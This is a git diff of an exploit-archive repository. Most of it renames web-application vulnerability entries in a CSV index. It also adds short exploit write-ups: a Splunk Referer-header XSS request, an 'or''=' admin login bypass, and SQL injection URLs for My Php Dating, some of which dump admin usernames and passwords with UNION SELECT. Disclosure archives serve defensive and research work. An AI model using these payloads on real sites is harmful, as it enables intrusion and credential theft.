36641,platforms/php/webapps/36641.txt,"u-Auctions - Multiple Vulnerabilities",2015-04-05,*Don*,php,webapps,0
@ -34863,7 +34864,7 @@ id,file,description,date,author,platform,type,port
36643,platforms/php/webapps/36643.txt,"4Images 1.7.10 - admin/categories.php cat_parent_id Parameter SQL Injection",2012-01-31,RandomStorm,php,webapps,0
36644,platforms/php/webapps/36644.txt,"4Images 1.7.10 - admin/categories.php cat_parent_id Parameter Cross-Site Scripting",2012-01-31,RandomStorm,php,webapps,0
36645,platforms/php/webapps/36645.txt,"4Images 1.7.10 - admin/index.php redirect Parameter Arbitrary Site Redirect",2012-01-31,RandomStorm,php,webapps,0
36646,platforms/php/webapps/36646.txt,"Joomla! Component 'com_cmotour' - 'id' Parameter SQL Injection",2012-01-28,the_cyber_nuxbie,php,webapps,0
36646,platforms/php/webapps/36646.txt,"Joomla! Component com_cmotour - 'id' Parameter SQL Injection",2012-01-28,the_cyber_nuxbie,php,webapps,0
36647,platforms/php/webapps/36647.txt,"Lead Capture - 'login.php' Script Cross-Site Scripting",2012-01-21,HashoR,php,webapps,0
36648,platforms/php/webapps/36648.txt,"OpenEMR 4.1 - Interface/patient_file/encounter/trend_form.php formname Parameter Traversal Local File Inclusion",2012-02-01,"High-Tech Bridge SA",php,webapps,0
36649,platforms/php/webapps/36649.txt,"OpenEMR 4.1 - Interface/patient_file/encounter/load_form.php formname Parameter Traversal Local File Inclusion",2012-02-01,"High-Tech Bridge SA",php,webapps,0
@ -34872,7 +34873,7 @@ id,file,description,date,author,platform,type,port
36654,platforms/php/webapps/36654.txt,"phpLDAPadmin 1.2.2 - 'base' Parameter Cross-Site Scripting",2012-02-01,andsarmiento,php,webapps,0
36655,platforms/php/webapps/36655.txt,"phpLDAPadmin 1.2.0.5-2 - 'server_id' Parameter Cross-Site Scripting",2012-02-01,andsarmiento,php,webapps,0
36656,platforms/php/webapps/36656.txt,"GForge 5.7.1 - Multiple Cross-Site Scripting Vulnerabilities",2012-02-02,sonyy,php,webapps,0
36657,platforms/php/webapps/36657.txt,"Joomla! Component 'com_bnf' - 'seccion_id' Parameter SQL Injection",2012-02-02,"Daniel Godoy",php,webapps,0
36657,platforms/php/webapps/36657.txt,"Joomla! Component com_bnf - 'seccion_id' Parameter SQL Injection",2012-02-02,"Daniel Godoy",php,webapps,0
36658,platforms/php/webapps/36658.txt,"iknSupport 'search' Module - Cross-Site Scripting",2012-02-02,"Red Security TEAM",php,webapps,0
36659,platforms/php/webapps/36659.txt,"Joomla! Component Currency Converter 1.0.0 - 'from' Parameter Cross-Site Scripting",2012-02-02,"BHG Security Center",php,webapps,0
36660,platforms/php/webapps/36660.txt,"project-open 3.4.x - 'account-closed.tcl' Cross-Site Scripting",2012-02-03,"Michail Poultsakis",php,webapps,0
@ -35000,7 +35001,7 @@ id,file,description,date,author,platform,type,port
36860,platforms/php/webapps/36860.txt,"WordPress Plugin TheCartPress 1.3.9 - Multiple Vulnerabilities",2015-04-29,"High-Tech Bridge SA",php,webapps,80
36861,platforms/windows/webapps/36861.txt,"Wing FTP Server Admin 4.4.5 - Multiple Vulnerabilities",2015-04-29,hyp3rlinx,windows,webapps,5466
36862,platforms/php/webapps/36862.txt,"OS Solution OSProperty 2.8.0 - SQL Injection",2015-04-29,"Brandon Perry",php,webapps,80
36863,platforms/php/webapps/36863.txt,"Joomla! Component 'com_machine' - Multiple SQL Injections",2012-02-20,the_cyber_nuxbie,php,webapps,0
36863,platforms/php/webapps/36863.txt,"Joomla! Component Machine - Multiple SQL Injections",2012-02-20,the_cyber_nuxbie,php,webapps,0
36867,platforms/php/webapps/36867.txt,"CPG Dragonfly CMS 9.3.3.0 - Multiple Multiple Cross-Site Scripting Vulnerabilities",2012-02-21,Ariko-Security,php,webapps,0
36870,platforms/php/webapps/36870.txt,"ContentLion Alpha 1.3 - 'login.php' Cross-Site Scripting",2012-02-22,"Stefan Schurtz",php,webapps,0
36873,platforms/php/webapps/36873.txt,"Dolibarr 3.2 Alpha - Multiple Directory Traversal Vulnerabilities",2012-02-22,"Benjamin Kunz Mejri",php,webapps,0
@ -35352,12 +35353,12 @@ id,file,description,date,author,platform,type,port
37372,platforms/java/webapps/37372.html,"BMC Identity Management - Cross-Site Request Forgery",2012-06-11,"Travis Lee",java,webapps,0
37373,platforms/php/webapps/37373.php,"WordPress Plugin Contus Video Gallery - 'upload1.php' Arbitrary File Upload",2012-06-12,"Sammy FORGIT",php,webapps,0
37374,platforms/php/webapps/37374.txt,"Joomla! Component 'com_alphacontent' - 'limitstart' Parameter SQL Injection",2012-06-10,xDarkSton3x,php,webapps,0
37375,platforms/php/webapps/37375.php,"Joomla! Component 'com_joomsport' - SQL Injection / Arbitrary File Upload",2012-06-11,KedAns-Dz,php,webapps,0
37375,platforms/php/webapps/37375.php,"Joomla! Component Joomsport - SQL Injection / Arbitrary File Upload",2012-06-11,KedAns-Dz,php,webapps,0
37376,platforms/php/webapps/37376.php,"XOOPS Cube PROJECT FileManager - 'xupload.php' Arbitrary File Upload",2012-06-12,KedAns-Dz,php,webapps,0
37377,platforms/php/webapps/37377.php,"WordPress Plugin HD FLV Player - 'uploadVideo.php' Arbitrary File Upload",2012-06-13,"Sammy FORGIT",php,webapps,0
37378,platforms/php/webapps/37378.php,"Joomla! Component 'com_simpleswfupload' - 'uploadhandler.php' Arbitrary File Upload",2012-06-12,"Sammy FORGIT",php,webapps,0
37379,platforms/php/webapps/37379.php,"Joomla! Component 'mod_artuploader' - 'upload.php' Arbitrary File Upload",2012-06-12,"Sammy FORGIT",php,webapps,0
37380,platforms/php/webapps/37380.php,"Joomla! Component 'com_dv' - 'upload.php' Arbitrary File Upload",2012-06-12,"Sammy FORGIT",php,webapps,0
37380,platforms/php/webapps/37380.php,"Joomla! Component DentroVideo 1.2 - 'upload.php' Arbitrary File Upload",2012-06-12,"Sammy FORGIT",php,webapps,0
37381,platforms/php/webapps/37381.html,"Joomla! Component 'IDoEditor' - 'image.php' Arbitrary File Upload",2012-06-13,"Sammy FORGIT",php,webapps,0
37382,platforms/php/webapps/37382.php,"Joomla! Component 'mod_jfancy' - 'script.php' Arbitrary File Upload",2012-06-13,"Sammy FORGIT",php,webapps,0
37383,platforms/php/webapps/37383.php,"Joomla! Component Easy Flash Uploader - 'helper.php' Arbitrary File Upload",2012-06-12,"Sammy FORGIT",php,webapps,0
@ -35375,10 +35376,10 @@ id,file,description,date,author,platform,type,port
37407,platforms/php/webapps/37407.txt,"ADICO - 'index.php' Script SQL Injection",2012-06-15,"Ibrahim El-Sayed",php,webapps,0
37408,platforms/php/webapps/37408.txt,"Simple Forum PHP - Multiple SQL Injections",2012-06-14,"Vulnerability Research Laboratory",php,webapps,0
37409,platforms/php/webapps/37409.txt,"NetArt Media Jobs Portal - SQL Injection",2012-06-14,"Ibrahim El-Sayed",php,webapps,0
37410,platforms/php/webapps/37410.php,"Joomla! Component 'com_hwdvideoshare' - 'flash_upload.php' Arbitrary File Upload",2012-06-17,"Sammy FORGIT",php,webapps,0
37410,platforms/php/webapps/37410.php,"Joomla! Component hwdVideoShare - 'flash_upload.php' Arbitrary File Upload",2012-06-17,"Sammy FORGIT",php,webapps,0
37411,platforms/php/webapps/37411.txt,"WordPress Plugin ORGanizer - Multiple Vulnerabilities",2012-06-15,MustLive,php,webapps,0
37412,platforms/php/webapps/37412.php,"Joomla! Component 'com_maianmedia' - 'uploadhandler.php' Arbitrary File Upload",2012-06-16,"Sammy FORGIT",php,webapps,0
37413,platforms/php/webapps/37413.txt,"Joomla! Component 'com_jcalpro' - SQL Injection",2012-06-15,"Taurus Omar",php,webapps,0
37412,platforms/php/webapps/37412.php,"Joomla! Component Maian Media - 'uploadhandler.php' Arbitrary File Upload",2012-06-16,"Sammy FORGIT",php,webapps,0
37413,platforms/php/webapps/37413.txt,"Joomla! Component JCal Pro Calendar - SQL Injection",2012-06-15,"Taurus Omar",php,webapps,0
37414,platforms/php/webapps/37414.txt,"Simple Document Management System 1.1.5 - Multiple SQL Injections",2012-06-16,JosS,php,webapps,0
37415,platforms/php/webapps/37415.txt,"Webify Multiple Products - Multiple HTML Injection / Local File Inclusion",2012-06-16,snup,php,webapps,0
37416,platforms/java/webapps/37416.txt,"Squiz CMS - Multiple Cross-Site Scripting and XML External Entity Injection Vulnerabilities",2012-06-14,"Nadeem Salim",java,webapps,0
@ -35457,7 +35458,7 @@ id,file,description,date,author,platform,type,port
37514,platforms/php/webapps/37514.txt,"WordPress Plugin ACF Frontend Display 2.0.5 - Arbitrary File Upload",2015-07-07,"TUNISIAN CYBER",php,webapps,80
37515,platforms/php/webapps/37515.txt,"phpLiteAdmin 1.1 - Multiple Vulnerabilities",2015-07-07,hyp3rlinx,php,webapps,80
37516,platforms/hardware/webapps/37516.txt,"D-Link DSL-2750u / DSL-2730u - Authenticated Local File Disclosure",2015-07-07,"SATHISH ARTHAR",hardware,webapps,0
37519,platforms/php/webapps/37519.txt,"Joomla! Component 'com_hello' - 'Controller' Parameter Local File Inclusion",2012-07-19,"AJAX Security Team",php,webapps,0
37519,platforms/php/webapps/37519.txt,"Joomla! Component com_hello - 'Controller' Parameter Local File Inclusion",2012-07-19,"AJAX Security Team",php,webapps,0
37520,platforms/php/webapps/37520.txt,"Maian Survey - 'index.php' URI redirection / Local File Inclusion",2012-07-20,PuN!Sh3r,php,webapps,0
37521,platforms/php/webapps/37521.txt,"CodeIgniter 2.1 - 'xss_clean()' Filter Security Bypass",2012-07-19,"Krzysztof Kotowicz",php,webapps,0
37522,platforms/php/webapps/37522.txt,"WordPress Plugin chenpress - Arbitrary File Upload",2012-07-21,Am!r,php,webapps,0
@ -35470,7 +35471,7 @@ id,file,description,date,author,platform,type,port
37532,platforms/hardware/webapps/37532.txt,"AirLive Multiple Products - OS Command Injection",2015-07-08,"Core Security",hardware,webapps,8080
37533,platforms/asp/webapps/37533.txt,"Orchard CMS 1.7.3/1.8.2/1.9.0 - Persistent Cross-Site Scripting",2015-07-08,"Paris Zoumpouloglou",asp,webapps,80
37537,platforms/php/webapps/37537.txt,"phpProfiles - Multiple Vulnerabilities",2012-07-24,L0n3ly-H34rT,php,webapps,0
37540,platforms/php/webapps/37540.txt,"Joomla! Component 'com_odudeprofile' - 'profession' Parameter SQL Injection",2012-07-25,"Daniel Barragan",php,webapps,0
37540,platforms/php/webapps/37540.txt,"Joomla! Component Odudeprofile 2.8 - 'profession' Parameter SQL Injection",2012-07-25,"Daniel Barragan",php,webapps,0
37541,platforms/php/webapps/37541.txt,"tekno.Portal 0.1b - 'anket.php' SQL Injection",2012-07-25,Socket_0x03,php,webapps,0
37544,platforms/php/webapps/37544.txt,"ocPortal 7.1.5 - 'redirect' Parameter URI redirection",2012-07-29,"Aung Khant",php,webapps,0
37547,platforms/php/webapps/37547.txt,"Scrutinizer 9.0.1.19899 - Multiple Cross-Site Scripting Vulnerabilities",2012-07-30,"Mario Ceballos",php,webapps,0
@ -35544,7 +35545,7 @@ id,file,description,date,author,platform,type,port
37644,platforms/php/webapps/37644.txt,"Jara 1.6 - Multiple SQL Injections / Multiple Cross-Site Scripting Vulnerabilities",2012-08-22,"Canberk BOLAT",php,webapps,0
37645,platforms/php/webapps/37645.txt,"OrderSys 1.6.4 - Multiple SQL Injections / Multiple Cross-Site Scripting Vulnerabilities",2012-08-22,"Canberk BOLAT",php,webapps,0
37646,platforms/php/webapps/37646.txt,"Banana Dance - Cross-Site Scripting / SQL Injection",2012-08-22,"Canberk BOLAT",php,webapps,0
37648,platforms/php/webapps/37648.txt,"Joomla! Component 'com_civicrm' - Multiple Arbitrary File Upload Vulnerabilities",2012-08-22,Crim3R,php,webapps,0
37648,platforms/php/webapps/37648.txt,"Joomla! Component CiviCRM - Multiple Arbitrary File Upload Vulnerabilities",2012-08-22,Crim3R,php,webapps,0
37649,platforms/php/webapps/37649.html,"SiNG cms - 'Password.php' Cross-Site Scripting",2012-08-23,LiquidWorm,php,webapps,0
37650,platforms/php/webapps/37650.txt,"1024 CMS 2.1.1 - 'p' Parameter SQL Injection",2012-08-22,kallimero,php,webapps,0
37651,platforms/php/webapps/37651.html,"Monstra - Multiple HTML Injection Vulnerabilities",2012-08-23,LiquidWorm,php,webapps,0
@ -35712,7 +35713,7 @@ id,file,description,date,author,platform,type,port
38004,platforms/hardware/webapps/38004.txt,"Samsung SyncThruWeb 2.01.00.26 - SMB Hash Disclosure",2015-08-29,"Shad Malloy",hardware,webapps,80
38006,platforms/php/webapps/38006.txt,"BloofoxCMS 0.3.5 - Multiple Cross-Site Scripting Vulnerabilities",2012-10-31,"Canberk BOLAT",php,webapps,0
38007,platforms/php/webapps/38007.txt,"DCForum - auth_user_file.txt File Multiple Information Disclosure Vulnerabilities",2012-11-02,r45c4l,php,webapps,0
38008,platforms/php/webapps/38008.txt,"Joomla! Component 'com_parcoauto' - 'idVeicolo' Parameter SQL Injection",2012-11-03,"Andrea Bocchetti",php,webapps,0
38008,platforms/php/webapps/38008.txt,"Joomla! Component Parcoauto - 'idVeicolo' Parameter SQL Injection",2012-11-03,"Andrea Bocchetti",php,webapps,0
38009,platforms/php/webapps/38009.txt,"AWAuctionScript CMS - Multiple Remote Vulnerabilities",2012-11-04,X-Cisadane,php,webapps,0
38010,platforms/php/webapps/38010.txt,"VeriCentre - Multiple SQL Injections",2012-11-06,"Cory Eubanks",php,webapps,0
38011,platforms/php/webapps/38011.txt,"OrangeHRM - 'sortField' Parameter SQL Injection",2012-11-07,"High-Tech Bridge",php,webapps,0
@ -36106,7 +36107,7 @@ id,file,description,date,author,platform,type,port
38803,platforms/php/webapps/38803.txt,"WordPress Plugin WP-Client 3.8.7 - Persistent Cross-Site Scripting",2015-11-24,"Pier-Luc Maltais",php,webapps,80
38782,platforms/php/webapps/38782.php,"WordPress Plugin SEO Watcher - 'ofc_upload_image.php' Arbitrary PHP Code Execution",2013-10-03,wantexz,php,webapps,0
38776,platforms/cgi/webapps/38776.txt,"Cambium ePMP 1000 - Multiple Vulnerabilities",2015-11-20,"Karn Ganeshen",cgi,webapps,0
38777,platforms/php/webapps/38777.txt,"Joomla! Component 'com_jvideoclip' - 'uid' Parameter SQL Injection",2013-09-21,SixP4ck3r,php,webapps,0
38777,platforms/php/webapps/38777.txt,"Joomla! Component JVideoClip 1.5.1 - 'uid' Parameter SQL Injection",2013-09-21,SixP4ck3r,php,webapps,0
38780,platforms/php/webapps/38780.txt,"Silverstripe CMS - Multiple HTML Injection Vulnerabilities",2013-09-23,"Benjamin Kunz Mejri",php,webapps,0
38783,platforms/php/webapps/38783.php,"WordPress Plugin Woopra Analytics - 'ofc_upload_image.php' Arbitrary PHP Code Execution",2013-10-07,wantexz,php,webapps,0
38784,platforms/php/webapps/38784.txt,"Alienvault Open Source SIEM (OSSIM) - 'Timestamp' Parameter Directory Traversal",2013-10-08,"Ding Yu-Chi",php,webapps,0
@ -36120,7 +36121,7 @@ id,file,description,date,author,platform,type,port
38807,platforms/cgi/webapps/38807.txt,"Bugzilla 4.2 - Tabular Reports Unspecified Cross-Site Scripting",2013-10-09,"Mateusz Goik",cgi,webapps,0
38808,platforms/php/webapps/38808.txt,"WordPress Plugin WP-Realty - 'listing_id' Parameter SQL Injection",2013-10-08,Napsterakos,php,webapps,0
38811,platforms/php/webapps/38811.txt,"WordPress Theme Daily Deal - Arbitrary File Upload",2013-10-23,DevilScreaM,php,webapps,0
38814,platforms/php/webapps/38814.php,"Joomla! Component 'com_maian15' - 'name' Parameter Arbitrary File Upload",2013-10-20,SultanHaikal,php,webapps,0
38814,platforms/php/webapps/38814.php,"Joomla! Component Maian15 - 'name' Parameter Arbitrary File Upload",2013-10-20,SultanHaikal,php,webapps,0
38816,platforms/jsp/webapps/38816.html,"JReport - 'dealSchedules.jsp' Cross-Site Request Forgery",2013-10-25,"Poonam Singh",jsp,webapps,0
38819,platforms/php/webapps/38819.txt,"Course Registration Management System - Cross-Site Scripting / SQL Injection",2013-10-21,"Omar Kurt",php,webapps,0
38820,platforms/php/webapps/38820.php,"WordPress Theme This Way - 'upload_settings_image.php' Arbitrary File Upload",2013-11-01,Bet0,php,webapps,0
@ -36293,7 +36294,7 @@ id,file,description,date,author,platform,type,port
39136,platforms/php/webapps/39136.txt,"Symphony 2.2.4 - Cross-Site Request Forgery",2014-03-24,"High-Tech Bridge",php,webapps,0
39137,platforms/cgi/webapps/39137.txt,"Primo Interactive CMS - 'pcm.cgi' Remote Command Execution",2014-03-31,"Felipe Andrian Peixoto",cgi,webapps,0
39139,platforms/php/webapps/39139.txt,"PHPFox - Access Control Security Bypass",2014-04-05,"Wesley Henrique",php,webapps,0
39140,platforms/php/webapps/39140.txt,"Joomla! Component 'com_inneradmission' - 'index.php' SQL Injection",2014-04-08,Lazmania61,php,webapps,0
39140,platforms/php/webapps/39140.txt,"Joomla! Component Inneradmission - 'index.php' SQL Injection",2014-04-08,Lazmania61,php,webapps,0
39141,platforms/php/webapps/39141.txt,"eazyCMS - 'index.php' SQL Injection",2014-04-09,Renzi,php,webapps,0
39142,platforms/jsp/webapps/39142.txt,"Xangati - /servlet/MGConfigData Multiple Parameter Directory Traversal",2014-04-14,"Jan Kadijk",jsp,webapps,0
39143,platforms/jsp/webapps/39143.txt,"Xangati - /servlet/Installer file Parameter Directory Traversal",2014-04-14,"Jan Kadijk",jsp,webapps,0
@ -36493,7 +36494,7 @@ id,file,description,date,author,platform,type,port
39587,platforms/php/webapps/39587.txt,"iTop 2.2.1 - Cross-Site Request Forgery",2016-03-21,"High-Tech Bridge SA",php,webapps,80
39588,platforms/php/webapps/39588.txt,"ProjectSend r582 - Multiple Cross-Site Scripting Vulnerabilities",2016-03-21,"Michael Helwig",php,webapps,80
39589,platforms/php/webapps/39589.txt,"WordPress Plugin HB Audio Gallery Lite 1.0.0 - Arbitrary File Download",2016-03-22,CrashBandicot,php,webapps,80
39590,platforms/php/webapps/39590.txt,"Joomla! Component 'com_easy_youtube_gallery' 1.0.2 - SQL Injection",2016-03-22,"Persian Hack Team",php,webapps,80
39590,platforms/php/webapps/39590.txt,"Joomla! Component Easy Youtube Gallery 1.0.2 - SQL Injection",2016-03-22,"Persian Hack Team",php,webapps,80
39591,platforms/php/webapps/39591.txt,"WordPress Plugin Brandfolder 3.0 - Remote File Inclusion / Local File Inclusion",2016-03-22,AMAR^SHG,php,webapps,80
39592,platforms/php/webapps/39592.txt,"WordPress Plugin Dharma Booking 2.38.3 - File Inclusion",2016-03-22,AMAR^SHG,php,webapps,80
39593,platforms/php/webapps/39593.txt,"WordPress Plugin Memphis Document Library 3.1.5 - Arbitrary File Download",2016-03-22,"Felipe Molina",php,webapps,80
@ -36614,7 +36615,7 @@ id,file,description,date,author,platform,type,port
39932,platforms/php/webapps/39932.html,"Viart Shopping Cart 5.0 - Cross-Site Request Forgery / Arbitrary File Upload",2016-06-13,"Ali Ghanbari",php,webapps,80
39934,platforms/php/webapps/39934.txt,"Dream Gallery 2.0 - Admin Panel Authentication Bypass",2016-06-13,"Ali BawazeEer",php,webapps,80
39935,platforms/php/webapps/39935.txt,"Grid Gallery 1.0 - Admin Panel Authentication Bypass",2016-06-13,"Ali BawazeEer",php,webapps,80
39936,platforms/php/webapps/39936.txt,"Joomla! Component 'com_payplans' 3.3.6 - SQL Injection",2016-06-13,"Persian Hack Team",php,webapps,80
39936,platforms/php/webapps/39936.txt,"Joomla! Component com_payplans 3.3.6 - SQL Injection",2016-06-13,"Persian Hack Team",php,webapps,80
39937,platforms/php/webapps/39937.py,"Zabbix 2.2 < 3.0.3 - API JSON-RPC Remote Code Execution",2016-06-13,"Alexander Gurin",php,webapps,80
39946,platforms/php/webapps/39946.php,"WordPress Plugin Social Stream 1.5.15 - wp_options Overwrite",2016-06-14,wp0Day.com,php,webapps,80
39948,platforms/php/webapps/39948.txt,"Ultrabenosaurus ChatBoard - Persistent Cross-Site Scripting",2016-06-15,HaHwul,php,webapps,80
@ -36622,7 +36623,7 @@ id,file,description,date,author,platform,type,port
39950,platforms/php/webapps/39950.txt,"w2wiki - Multiple Cross-Site Scripting Vulnerabilities",2016-06-15,HaHwul,php,webapps,80
39951,platforms/hardware/webapps/39951.txt,"Hyperoptic (Tilgin) Router HG23xx - Multiple Vulnerabilities",2016-06-15,LiquidWorm,hardware,webapps,80
39952,platforms/php/webapps/39952.txt,"Dokeos 2.2.1 - Blind SQL Injection",2016-06-15,Mormoroth,php,webapps,80
39953,platforms/php/webapps/39953.txt,"Joomla! Component 'com_enmasse' 5.1 < 6.4 - SQL Injection",2016-06-15,"Hamed Izadi",php,webapps,80
39953,platforms/php/webapps/39953.txt,"Joomla! Component com_enmasse 5.1 < 6.4 - SQL Injection",2016-06-15,"Hamed Izadi",php,webapps,80
39955,platforms/php/webapps/39955.txt,"BookingWizz Booking System < 5.5 - Multiple Vulnerabilities",2016-06-15,"Mehmet Ince",php,webapps,80
39956,platforms/php/webapps/39956.txt,"jbFileManager - Directory Traversal",2016-06-15,HaHwul,php,webapps,80
39957,platforms/php/webapps/39957.py,"PHPLive 4.4.8 < 4.5.4 - Password Recovery SQL Injection",2016-06-15,"Tiago Carvalho",php,webapps,80
@ -36635,7 +36636,7 @@ id,file,description,date,author,platform,type,port
39972,platforms/php/webapps/39972.txt,"phpATM 1.32 - Multiple Vulnerabilities",2016-06-17,"Paolo Massenio",php,webapps,80
39974,platforms/php/webapps/39974.html,"WordPress Plugin Ultimate Product Catalog 3.8.1 - Privilege Escalation",2016-06-20,"i0akiN SEC-LABORATORY",php,webapps,80
39976,platforms/php/webapps/39976.txt,"sNews CMS 1.7.1 - Multiple Vulnerabilities",2016-06-20,hyp3rlinx,php,webapps,80
39977,platforms/php/webapps/39977.txt,"Joomla! Component 'com_bt_media' - SQL Injection",2016-06-20,"Persian Hack Team",php,webapps,80
39977,platforms/php/webapps/39977.txt,"Joomla! Component com_bt_media 1.0 - SQL Injection",2016-06-20,"Persian Hack Team",php,webapps,80
39978,platforms/php/webapps/39978.php,"WordPress Plugin Premium SEO Pack 1.9.1.3 - wp_options Overwrite",2016-06-20,wp0Day.com,php,webapps,80
39981,platforms/php/webapps/39981.html,"Airia - Cross-Site Request Forgery (Add Content)",2016-06-20,HaHwul,php,webapps,80
39982,platforms/php/webapps/39982.rb,"Airia - Arbitrary File Upload",2016-06-20,HaHwul,php,webapps,80
@ -36647,7 +36648,7 @@ id,file,description,date,author,platform,type,port
39996,platforms/java/webapps/39996.txt,"SAP NetWeaver AS JAVA 7.1 < 7.5 - Directory Traversal",2016-06-21,ERPScan,java,webapps,0
39997,platforms/ruby/webapps/39997.txt,"Radiant CMS 1.1.3 - Multiple Persistent Cross-Site Scripting",2016-06-21,"David Silveiro",ruby,webapps,80
39998,platforms/php/webapps/39998.txt,"YetiForce CRM < 3.1 - Persistent Cross-Site Scripting",2016-06-21,"David Silveiro",php,webapps,80
40111,platforms/php/webapps/40111.txt,"Joomla! Component 'com_guru' - SQL Injection",2016-07-14,s0nk3y,php,webapps,80
40111,platforms/php/webapps/40111.txt,"Joomla! Component Guru Pro - SQL Injection",2016-07-14,s0nk3y,php,webapps,80
40006,platforms/php/webapps/40006.txt,"Alibaba Clone B2B Script - Arbitrary File Disclosure",2016-06-23,"Meisam Monsef",php,webapps,80
40009,platforms/php/webapps/40009.txt,"XuezhuLi FileSharing - Directory Traversal",2016-06-23,HaHwul,php,webapps,80
40010,platforms/php/webapps/40010.html,"XuezhuLi FileSharing - Cross-Site Request Forgery (Add User)",2016-06-23,HaHwul,php,webapps,80
@ -36938,4 +36939,7 @@ id,file,description,date,author,platform,type,port
40982,platforms/hardware/webapps/40982.html,"Xfinity Gateway (Technicolor DPC3941T) - Cross-Site Request Forgery",2016-08-09,"Ayushman Dutta",hardware,webapps,0
40986,platforms/php/webapps/40986.py,"PHPMailer < 5.2.20 / SwiftMailer < 5.4.5-DEV / Zend Framework / zend-mail < 2.4.11 - (AIO) 'PwnScriptum' Remote Code Execution",2017-01-02,"Dawid Golunski",php,webapps,0
40989,platforms/jsp/webapps/40989.txt,"Atlassian Confluence < 5.10.6 - Persistent Cross-Site Scripting",2017-01-04,"Jodson Santos",jsp,webapps,0
40996,platforms/php/webapps/40996.txt,"DirectAdmin 1.50.1 - Denial of Service",2017-01-08,"IeDb ir",php,webapps,0
40997,platforms/php/webapps/40997.txt,"Splunk 6.1.1 - 'Referer' Header Cross-Site Scripting",2017-01-07,justpentest,php,webapps,0
40998,platforms/php/webapps/40998.txt,"My Link Trader 1.1 - Authentication Bypass",2017-01-07,"Ihsan Sencan",php,webapps,0
40999,platforms/php/webapps/40999.txt,"My Php Dating 2.0 - 'path' Parameter SQL Injection",2017-01-09,"Ihsan Sencan",php,webapps,0
41001,platforms/php/webapps/41001.txt,"My Php Dating 2.0 - 'id' Parameter SQL Injection",2017-01-09,"Sniper Pex",php,webapps,0

Can't render this file because it is too large.

View file

@ -217,7 +217,7 @@ if ($s==1){
$count=0;
$res=nl2br(htmlentities($html));
$str =
array('2.0.11&lt;/title','2.0.12</title','2.0.13&lt;/title','2.0.14&lt;/title','2.0.15&lt;/title','1.5.7.10&lt;/title','1.5.7.11&lt;/title','1.5.7.12&lt;/title','1.5.7.13&lt;/title','1.5.7.14&lt;/title');
array('2.0.11</title','2.0.12</title','2.0.13</title','2.0.14</title','2.0.15</title','1.5.7.10</title','1.5.7.11</title','1.5.7.12</title','1.5.7.13</title','1.5.7.14</title');
foreach ($str as $value){
$pos = strpos($res, $value);
if ($pos === false) {

View file

@ -4,4 +4,4 @@ The 'com_community' component for Joomla! is prone to an SQL-injection vulnerabi
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/index.php?option=com_community&amp;view=profile&amp;userid=156
http://www.example.com/index.php?option=com_community&view=profile&userid=156

29
platforms/php/webapps/40997.txt Executable file
View file

@ -0,0 +1,29 @@
# Exploit Title: Splunk 'Referer' Header Cross Site Scripting Vulnerability
# Date: 7th January 2017
# Exploit Author: justpentest
# Vendor Homepage: http://www.splunk.com/
# Version: Splunk 6.1.1 other versions may also be affected.
# Contact: transform2secure@gmail.com
Source: http://www.securityfocus.com/bid/67655/info
1) Description:
Splunk is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in an unsuspecting user's browser in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
2) Exploit:
URL: http://justpentest.com:8000/en-US/app/
GET /en-US/app/ HTTP/1.1
Host=justpentest.com:8000
User-Agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language=en-US,en;q=0.5
Accept-Encoding=gzip, deflate
Referer=javascript:prompt("XXS by justpentest");
Connection=keep-alive
----------------------------------------------------------------------------------------
Response:
<p>This page was linked to from <a href="javascript:prompt("XXS by justpentest");">javascript:prompt("XXS by justpentest");</a>.</p>

13
platforms/php/webapps/40998.txt Executable file
View file

@ -0,0 +1,13 @@
# # # # #
# Vulnerability:: Admin Login Bypass & SQLi
# Date:09.01.2017
# Vendor Homepage: http://software.friendsinwar.com/
# Script Name: My Link Trader
# Script Version: v1.1
# Script DL: http://software.friendsinwar.com/downloads.php?cat_id=2&file_id=13
# Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# http://localhost/[PATH]/admin/login.php and set Username and Password to 'or''=' and hit enter.
# # # # #

34
platforms/php/webapps/40999.txt Executable file
View file

@ -0,0 +1,34 @@
# # # # #
# Vulnerability: My Php Dating 2.0 - SQL Injection Web Vulnerability
# Google Dork: My Php Dating
# Date:09.01.2017
# Vendor Homepage: http://www.phponlinedatingsoftware.com/demo.htm
# Tested on: http://www.phponlinedatingsoftware.com/demo/
# Script Name: My Php Dating
# Script Version: 2.0
# Script Buy Now: http://www.phponlinedatingsoftware.com/order.htm
# Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/view_image.php?path=[SQL]
# # # # #
--------------------------------------------------
Note:
Rate: 0/10 [Rate Picture] <<<Link
--------------------------------------------------
http://localhost/[PATH]/view_image.php?path=-124 union select 1,version(),3,4,5,6,7,8,9
Version: javascript:%20ajax_rate_pic(5.5.52-cll,1,1)
--------------------------------------------------
http://localhost/[PATH]/view_image.php?path=-124+union+select+1,group_concat(admin_id,admin_uname,admin_pass,admin_email),3,4,5,6,7,8,9+from+admin_master--
--------------------------------------------------
http://localhost/[PATH]/view_image.php?path=-124+union+select+1,group_concat(column_name),3,4,5,6,7,8,9+from+information_schema.columns+where+table_schema=database()--
--------------------------------------------------
http://localhost/[PATH]/view_image.php?path=-124+union+select+1,group_concat(table_name),3,4,5,6,7,8,9+from+information_schema.tables+where+table_schema=database()--

23
platforms/php/webapps/41001.txt Executable file
View file

@ -0,0 +1,23 @@
# Vulnerability: My Php Dating 2.0 - SQL Injection
# Google Dork: use your mind
# Date: 09.01.2017
# Vendor Homepage: http://www.phponlinedatingsoftware.com/demo.htm
# Tested on: win7
# Author: Nassim Asrir
# Author Company: Henceforth
# Contact: wassline@gmail.com
#########################
# SQL Injection/Exploit :
# Vulnerable Parametre : id
# http://localhost/[PATH]/view_profile.php?id=[SQL]